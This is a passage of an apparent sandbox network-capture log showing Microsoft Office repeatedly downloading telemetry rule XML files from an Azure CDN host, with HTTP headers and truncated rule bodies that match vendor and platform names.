                                2024-12-03 16:51:26 UTC | 468 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                43 | 192.168.2.5 | 50010 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:27 UTC | 192 | OUT | GET /rules/rule120643v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:27 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:27 GMT
                                Content-Type: text/xml
                                Content-Length: 400
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                ETag: "0x8DC582BB2D62837"
                                x-ms-request-id: 241a7da4-a01e-00ab-50cc-439106000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165127Z-174f7845968psccphC1EWRuz9s00000016b000000000umhe
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:27 UTC | 400 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                44 | 192.168.2.5 | 50011 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:27 UTC | 192 | OUT | GET /rules/rule120644v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:27 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:27 GMT
                                Content-Type: text/xml
                                Content-Length: 479
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                ETag: "0x8DC582BB7D702D0"
                                x-ms-request-id: 6644a72f-f01e-001f-6d66-435dc8000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165127Z-174f7845968psccphC1EWRuz9s00000016d000000000nd54
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:27 UTC | 479 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                45 | 192.168.2.5 | 50012 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:28 UTC | 192 | OUT | GET /rules/rule120645v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:28 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:28 GMT
                                Content-Type: text/xml
                                Content-Length: 425
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                ETag: "0x8DC582BBA25094F"
                                x-ms-request-id: d2a0c1bd-101e-0017-761b-4147c7000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165128Z-174f7845968xlwnmhC1EWR0sv8000000160000000000k559
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:28 UTC | 425 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                46 | 192.168.2.5 | 50013 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:28 UTC | 192 | OUT | GET /rules/rule120646v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:28 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:28 GMT
                                Content-Type: text/xml
                                Content-Length: 475
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                                ETag: "0x8DC582BB2BE84FD"
                                x-ms-request-id: 2c2c8243-201e-006e-2a02-45bbe3000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165128Z-174f7845968cs2nkhC1EWR2tq000000001vg00000000h2yc
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:28 UTC | 475 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                47  192.168.2.5  50014  13.107.246.63  443
                                Timestamp  Bytes transferred  Direction  Data
                                2024-12-03 16:51:28 UTC  192  OUT  GET /rules/rule120647v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:29 UTC  470  IN  HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:29 GMT
                                Content-Type: text/xml
                                Content-Length: 448
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                ETag: "0x8DC582BB389F49B"
                                x-ms-request-id: e14f358b-d01e-007a-5d7e-3ff38c000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165129Z-174f78459684bddphC1EWRbht4000000161g000000000p7d
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:29 UTC  448  IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                48  192.168.2.5  50016  13.107.246.63  443
                                Timestamp  Bytes transferred  Direction  Data
                                2024-12-03 16:51:29 UTC  192  OUT  GET /rules/rule120649v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:30 UTC  470  IN  HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:29 GMT
                                Content-Type: text/xml
                                Content-Length: 416
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                                ETag: "0x8DC582BAEA4B445"
                                x-ms-request-id: 3fc8ca9f-401e-0083-6c91-3f075c000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165129Z-174f7845968xr5c2hC1EWRd0hn0000000r1000000000gqy1
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:30 UTC  416  IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                49  192.168.2.5  50015  13.107.246.63  443
                                Timestamp  Bytes transferred  Direction  Data
                                2024-12-03 16:51:29 UTC  192  OUT  GET /rules/rule120648v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:30 UTC  470  IN  HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:29 GMT
                                Content-Type: text/xml
                                Content-Length: 491
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                ETag: "0x8DC582B98B88612"
                                x-ms-request-id: 22106228-c01e-007a-5d36-40b877000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165129Z-174f7845968zgtf6hC1EWRqd8s0000000z6000000000avxz
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:30 UTC  491  IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                50  192.168.2.5  50017  13.107.246.63  443
                                Timestamp  Bytes transferred  Direction  Data
                                2024-12-03 16:51:30 UTC  192  OUT  GET /rules/rule120650v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:31 UTC  470  IN  HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:30 GMT
                                Content-Type: text/xml
                                Content-Length: 479
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                ETag: "0x8DC582B989EE75B"
                                x-ms-request-id: 83b34a83-b01e-0053-35ab-42cdf8000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165130Z-174f7845968zgtf6hC1EWRqd8s0000000z8g000000000m9g
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:31 UTC  479  IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                51  192.168.2.5  50018  13.107.246.63  443
                                Timestamp  Bytes transferred  Direction  Data
                                2024-12-03 16:51:30 UTC  192  OUT  GET /rules/rule120651v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:31 UTC  470  IN  HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:30 GMT
                                Content-Type: text/xml
                                Content-Length: 415
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                ETag: "0x8DC582BA80D96A1"
                                x-ms-request-id: 9d60b28b-101e-0017-33c7-4347c7000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165130Z-174f7845968jrjrxhC1EWRmmrs00000016dg000000004kmz
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:31 UTC  415  IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                52  192.168.2.5  50019  13.107.246.63  443
                                Timestamp  Bytes transferred  Direction  Data
                                2024-12-03 16:51:31 UTC  192  OUT  GET /rules/rule120652v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:32 UTC  470  IN  HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:32 GMT
                                Content-Type: text/xml
                                Content-Length: 471
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                ETag: "0x8DC582B97E6FCDD"
                                x-ms-request-id: e98b0d1a-601e-000d-7eee-442618000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165132Z-174f7845968j6t2phC1EWRcfe800000016eg000000002esf
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:32 UTC  471  IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                53  192.168.2.5  50021  13.107.246.63  443
                                Timestamp  Bytes transferred  Direction  Data
                                2024-12-03 16:51:32 UTC  192  OUT  GET /rules/rule120654v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:32 UTC  470  IN  HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:32 GMT
                                Content-Type: text/xml
                                Content-Length: 477
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                ETag: "0x8DC582BA54DCC28"
                                x-ms-request-id: 7af319f3-d01e-0017-6a91-3fb035000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165132Z-174f7845968zgtf6hC1EWRqd8s0000000z3g00000000ne1x
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:32 UTC  477  IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                54  192.168.2.5  50020  13.107.246.63  443
                                Timestamp  Bytes transferred  Direction  Data
                                2024-12-03 16:51:32 UTC  192  OUT  GET /rules/rule120653v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:33 UTC  470  IN  HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:32 GMT
                                Content-Type: text/xml
                                Content-Length: 419
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                ETag: "0x8DC582B9C710B28"
                                x-ms-request-id: 5cf18767-601e-000d-7d91-3f2618000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165132Z-174f78459685726chC1EWRsnbg000000167g00000000gpy1
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:33 UTC  419  IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                55  192.168.2.5  50022  13.107.246.63  443
                                Timestamp  Bytes transferred  Direction  Data
                                2024-12-03 16:51:33 UTC  192  OUT  GET /rules/rule120655v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:34 UTC  470  IN  HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:34 GMT
                                Content-Type: text/xml
                                Content-Length: 419
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                ETag: "0x8DC582BB7F164C3"
                                x-ms-request-id: dd02da03-701e-001e-0d91-3ff5e6000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165134Z-174f7845968cdxdrhC1EWRg0en000000163000000000qb0n
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:34 UTC  419  IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                56  192.168.2.5  50023  13.107.246.63  443
                                Timestamp  Bytes transferred  Direction  Data
                                2024-12-03 16:51:34 UTC  192  OUT  GET /rules/rule120656v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:34 UTC  470  IN  HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:34 GMT
                                Content-Type: text/xml
                                Content-Length: 477
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                ETag: "0x8DC582BA48B5BDD"
                                x-ms-request-id: b1291b2a-001e-0028-31ae-43c49f000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165134Z-174f7845968cpnpfhC1EWR3afc00000015w0000000008hau
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:34 UTC  477  IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                57  192.168.2.5  50024  13.107.246.63  443
                                Timestamp  Bytes transferred  Direction  Data
                                2024-12-03 16:51:34 UTC  192  OUT  GET /rules/rule120657v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:34 UTC  470  IN  HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:34 GMT
                                Content-Type: text/xml
                                Content-Length: 419
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                ETag: "0x8DC582B9FF95F80"
                                x-ms-request-id: 27481374-801e-0078-46b4-42bac6000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165134Z-174f7845968psccphC1EWRuz9s00000016e000000000ghn6
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:34 UTC  419  IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                58  192.168.2.5  50025  13.107.246.63  443
                                Timestamp  Bytes transferred  Direction  Data
                                2024-12-03 16:51:35 UTC  192  OUT  GET /rules/rule120658v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:35 UTC  470  IN  HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:35 GMT
                                Content-Type: text/xml
                                Content-Length: 472
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                ETag: "0x8DC582BB650C2EC"
                                x-ms-request-id: a15be10d-401e-0029-636c-439b43000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165135Z-174f7845968cpnpfhC1EWR3afc00000015qg00000000u4y0
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:35 UTC  472  IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID  Source IP  Source Port  Destination IP  Destination Port
                                59  192.168.2.5  50026  13.107.246.63  443
                                Timestamp  Bytes transferred  Direction  Data
                                2024-12-03 16:51:35 UTC  192  OUT  GET /rules/rule120659v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:35 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:35 GMT
                                Content-Type: text/xml
                                Content-Length: 468
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                ETag: "0x8DC582BB3EAF226"
                                x-ms-request-id: ce20f954-a01e-006f-7a27-4413cd000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165135Z-174f7845968xlwnmhC1EWR0sv800000015yg00000000rye7
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:35 UTC | 468 | IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                60 | 192.168.2.5 | 50027 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:36 UTC | 192 | OUT | GET /rules/rule120660v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:36 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:36 GMT
                                Content-Type: text/xml
                                Content-Length: 485
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                ETag: "0x8DC582BB9769355"
                                x-ms-request-id: 352cddbf-b01e-005c-1563-404c66000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165136Z-174f7845968nxc96hC1EWRspw80000001610000000003xyn
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:36 UTC | 485 | IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                61 | 192.168.2.5 | 50028 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:36 UTC | 192 | OUT | GET /rules/rule120661v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:36 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:36 GMT
                                Content-Type: text/xml
                                Content-Length: 411
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                ETag: "0x8DC582B989AF051"
                                x-ms-request-id: 4d2a6959-e01e-0085-41b2-42c311000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165136Z-174f7845968psccphC1EWRuz9s00000016eg00000000e774
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:36 UTC | 411 | IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                62 | 192.168.2.5 | 50029 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:36 UTC | 192 | OUT | GET /rules/rule120662v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:37 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:36 GMT
                                Content-Type: text/xml
                                Content-Length: 470
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                ETag: "0x8DC582BBB181F65"
                                x-ms-request-id: 20644146-d01e-0017-0115-41b035000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165136Z-174f784596886s2bhC1EWR743w00000016b0000000001syq
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:37 UTC | 470 | IN
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session ID | Source IP | Source Port | Destination IP | Destination Port
                                63 | 192.168.2.5 | 50030 | 13.107.246.63 | 443
                                Timestamp | Bytes transferred | Direction | Data
                                2024-12-03 16:51:37 UTC | 192 | OUT | GET /rules/rule120663v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:37 UTC | 470 | IN | HTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:37 GMT
                                Content-Type: text/xml
                                Content-Length: 427
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                ETag: "0x8DC582BB556A907"
                                x-ms-request-id: 4e3832d9-101e-005a-31c5-43882b000000
                                x-ms-version: 2018-03-28
